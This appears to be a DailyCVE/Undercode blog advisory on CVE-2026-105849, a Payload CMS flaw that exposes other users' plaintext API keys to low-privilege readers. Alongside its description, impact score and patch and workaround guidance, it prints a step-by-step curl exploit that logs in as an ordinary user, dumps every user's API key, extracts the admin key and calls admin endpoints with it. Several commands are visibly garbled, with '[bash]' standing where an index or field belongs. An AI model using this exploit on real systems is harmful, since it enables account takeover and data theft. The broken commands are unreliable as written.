Payload CMS, API Key Disclosure through Ordinary Document Reads, CVE-2026-105849 (High) -DC-Oct2026-2767

Listen to this Post

CVE-2026-105849 is a high-severity authorization bypass vulnerability affecting Payload CMS, a free and open-source headless content management system. The flaw exists in versions from 3.0.0 before 3.90.0, and canary versions from 4.0.0-canary.0 before 4.0.0-canary.34. The vulnerability arises from insufficient access control granularity when the useAPIKey authentication feature is enabled on a collection. In affected versions, the access control logic fails to properly isolate API key data from other sensitive user attributes when a user possesses basic read privileges on an authentication collection. This means any authenticated user with ordinary read access to other user documents can retrieve active, plaintext API keys belonging to those accounts. The core issue constitutes an Insecure Direct Object Reference (IDOR) or Broken Access Control scenario where the application does not enforce proper ownership checks on sensitive fields such as API keys. When useAPIKey is enabled, Payload generates and stores unique tokens that serve as long-lived authentication mechanisms for server-to-server communication or programmatic access. Due to the insufficient granularity of permission controls in earlier versions, a user with read-only rights can query the database directly through exposed endpoints or internal methods to retrieve these active API keys belonging to other accounts. This effectively bypasses the intended separation between administrative privileges and standard user roles, granting low-privilege users the ability to escalate their access significantly without needing valid login credentials for those target accounts. An exposed API key grants the target account’s permissions until the key is rotated or disabled. An attacker who obtains active API keys can impersonate legitimate users or administrators, depending on the permissions associated with those specific keys. This enables the extraction of sensitive content stored in the CMS, modification of records, deletion of data, or execution of administrative actions that should be restricted. Since API keys often persist for extended periods and may possess broader scopes than standard session tokens, the window of exploitation remains open until an administrator manually detects the breach and rotates or disables the compromised keys. This creates a significant risk to data integrity and confidentiality, particularly in environments where Payload CMS manages critical business logic or sensitive customer information. The vulnerability is classified under CWE-201 (Insertion of Sensitive Information Into Sent Data) and CWE-862 (Missing Authorization). The issue was fixed in Payload versions 3.90.0 and 4.0.0-canary.34.

DailyCVE Form:

Platform: Payload CMS
Version: 3.x, 4.x-canary
Vulnerability : API key disclosure
Severity: High
date: 2026-10-06

Prediction: Patched already (2026-09-18)

(end of form)

What Undercode Say:

Query the users collection to retrieve API keys
curl -X GET "https://target-cms.example.com/api/users?limit=100" \
-H "Authorization: Bearer <low-privilege-token>" \
-H "Content-Type: application/json"
Response may include apiKey field for each user document
Example response fragment:
{
"docs": [
{
"id": "user123",
"email": "[email protected]",
"apiKey": "pk_live_xxxxxxxxxxxxxxxxxxxxxxxx",
"enableAPIKey": true
}
]
}
// Vulnerable access control configuration
const Users = {
slug: 'users',
auth: {
useAPIKey: true, // Enables API key generation
},
access: {
read: () => true, // Any authenticated user can read all user docs
},
fields: [
// apiKey field is auto-generated and not restricted
],
};
Using the exposed API key to impersonate the target account
curl -X GET "https://target-cms.example.com/api/sensitive-data" \
-H "Authorization: users API-Key pk_live_xxxxxxxxxxxxxxxxxxxxxxxx"

Exploit: (Educational Purposes!)

Step 1: Authenticate as a low-privilege user
TOKEN=$(curl -s -X POST "https://target-cms.example.com/api/users/login" \
-H "Content-Type: application/json" \
-d '{"email":"[email protected]","password":"password123"}' \
| jq -r '.token')
Step 2: Retrieve all user documents including API keys
curl -s -X GET "https://target-cms.example.com/api/users?limit=100" \
-H "Authorization: Bearer $TOKEN" \
| jq '.docs[] | {email, apiKey}'
Step 3: Extract admin API key
ADMIN_KEY=$(curl -s -X GET "https://target-cms.example.com/api/users?where[bash][equals][email protected]" \
-H "Authorization: Bearer $TOKEN" \
| jq -r '.docs[bash].apiKey')
Step 4: Use admin API key to perform privileged actions
curl -s -X GET "https://target-cms.example.com/api/admin-only-endpoint" \
-H "Authorization: users API-Key $ADMIN_KEY"

Protection: from this CVE

Upgrade payload package to patched version
npm install [email protected]
Or for canary users
npm install [email protected]
Verify installed version
npm list payload
// Workaround: Disable useAPIKey if upgrade not immediately possible
const Users = {
slug: 'users',
auth: {
useAPIKey: false, // Disable API key feature
},
// ...
};
// Workaround: Restrict users to reading only their own authentication document
const Users = {
slug: 'users',
auth: {
useAPIKey: true,
},
access: {
read: ({ req: { user } }) => {
if (user) {
return { id: { equals: user.id } };
}
return false;
},
},
};
// Post-upgrade: Securely enable admin key viewing via reveal endpoint
const Users = {
slug: 'users',
auth: {
useAPIKey: {
reveal: true, // Allows admins to view keys via UI
},
},
};
Rotate potentially exposed API keys
This must be done manually through the Admin Panel or via API
for each affected user account.

Impact:

Users with read access to other user documents could access their active API keys. An exposed key grants the target account’s permissions until rotated or disabled. An attacker who obtains active API keys can impersonate legitimate users or administrators, depending on the permissions associated with those specific keys. This enables the extraction of sensitive content stored in the CMS, modification of records, deletion of data, or execution of administrative actions that should be restricted. The vulnerability has a CVSS 4.0 score of 7.7 (High) with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top